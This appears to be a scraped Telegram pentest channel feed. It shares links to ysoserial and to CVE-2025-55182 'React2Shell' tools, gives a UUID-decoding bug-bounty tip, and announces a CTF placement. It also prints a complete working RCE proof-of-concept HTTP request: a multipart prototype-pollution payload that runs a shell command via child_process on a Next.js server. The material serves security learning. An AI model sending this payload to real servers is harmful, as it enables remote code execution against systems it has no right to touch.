A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
https://github.com/frohoff/ysoserial
#deserialtiozan #java #web #pentest
https://github.com/frohoff/ysoserial
#deserialtiozan #java #web #pentest
GitHub
GitHub - frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. - frohoff/ysoserial
Cybred
🔥 10/10 React4shell В официальном блоге React только что выкатили пост про CVE-2025-55182, которая позволяет в один запрос получить RCE. Уязвимы версии 19.0.0, 19.1.0, 19.1.1, 19.2.0, а еще фреймворки Next.JS, Vite, Parcel, и Waku. Just when I thought the…
GitHub
GitHub - Ashwesker/Ashwesker-CVE-2025-55182: CVE-2025-55182
CVE-2025-55182. Contribute to Ashwesker/Ashwesker-CVE-2025-55182 development by creating an account on GitHub.
During a web application penetration test, we always aim to identify BAC (Broken Access Control) or IDOR vulnerabilities and etc. Along the way, we often encounter parameters such as “id=”, “user=”, or sometimes more complex ones like UUIDs. While guessing a UUID is nearly impossible, it’s still worth analyzing—doing so increases our chances of discovering high‑severity issues.
Even when we’re fully authenticated, we can inspect these parameters through Burp Suite or any other proxy tool. What I want to highlight is that UUIDs can sometimes be analyzed using online tools like https://www.uuidtools.com/decode
. It won’t always work—this often depends on how the developer implemented the system— but if decoding the UUID gives the desired result, you can expect to find some good bugs.
Happy hacking, go to find your bugs! 🐞🔥
#Web #BugBounty #Pentest #UUID
Even when we’re fully authenticated, we can inspect these parameters through Burp Suite or any other proxy tool. What I want to highlight is that UUIDs can sometimes be analyzed using online tools like https://www.uuidtools.com/decode
. It won’t always work—this often depends on how the developer implemented the system— but if decoding the UUID gives the desired result, you can expect to find some good bugs.
Happy hacking, go to find your bugs! 🐞🔥
#Web #BugBounty #Pentest #UUID
React2Shell Ultimate - The most comprehensive CVE-2025-66478 Scanner for Next.js RSC RCE vulnerability. Multi-mode detection, WAF bypass, local scanning.
https://github.com/hackersatyamrastogi/react2shell-ultimate
https://github.com/hackersatyamrastogi/react2shell-ultimate
🔥1
https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3#file-cve-2025-55182-http
There is Active Detection Template for CVE-2025-55182. You can find this vuln with your Nuclei. For this you must add .yaml POC for your Nuclei !
There is Active Detection Template for CVE-2025-55182. You can find this vuln with your Nuclei. For this you must add .yaml POC for your Nuclei !
Gist
CVE-2025-55182 React Server Components RCE POC
CVE-2025-55182 React Server Components RCE POC. GitHub Gist: instantly share code, notes, and snippets.
POC:
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 744
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var res=process.mainModule.require('child_process').execSync('whoami',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
In the field of cybersecurity, it is essential to continuously study publicly available exploits or vulnerabilities discovered in certain technologies. You can learn how to use the latest emerging exploits through the "recent-threats" module available on TryHackMe at https://tryhackme.com/module/recent-threats . I hope this will be useful for you!
#tryhackme #pentest #cybersecurity #CVE
#tryhackme #pentest #cybersecurity #CVE
Forwarded from Turan Security
🏆 BlackHat MEA 2025 CTF musobaqasida 12-o'rin!
☠️ Turan Security va 🇺🇿O'zbekiston sharafini himoya qilgan jamoa dunyoning eng nufuzli kiberxavfsizlik musobaqalaridan birida 125 jamoa orasidan TOP-12 talikdan joy oldi!
Saudiya Arabistoning Ar-Riyod shahrida o‘tkazilgan BlackHat MEA tadbiri - global miqyosdagi eng kuchli mutaxassislar, ekspertlar va jahonning yetakchi kiberxavfsizlik jamoalari uchrashadigan maydon.
TOP jamoalar orasida Team lead’imiz qiyinlik darajasi yuqori bo'lgan 3 ta taskda:
Bizning maqsadimiz xalqaro maydonda O‘zbekistonni nufuzini oshirish, yoshlarga ilhom berish va kiberxavfsizlik sohasini rivojlantirishga hissa qo’shish.
Saudiya Arabistoning Ar-Riyod shahrida o‘tkazilgan BlackHat MEA tadbiri - global miqyosdagi eng kuchli mutaxassislar, ekspertlar va jahonning yetakchi kiberxavfsizlik jamoalari uchrashadigan maydon.
TOP jamoalar orasida Team lead’imiz qiyinlik darajasi yuqori bo'lgan 3 ta taskda:
🚩Firstblood - web, birinchi;
🚩Firstblood - forensics, birinchi;
🚩Secondblood - web, ikkinchi bo'lib flagni aniqlashga erishdi.
Bizning maqsadimiz xalqaro maydonda O‘zbekistonni nufuzini oshirish, yoshlarga ilhom berish va kiberxavfsizlik sohasini rivojlantirishga hissa qo’shish.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3👍2❤1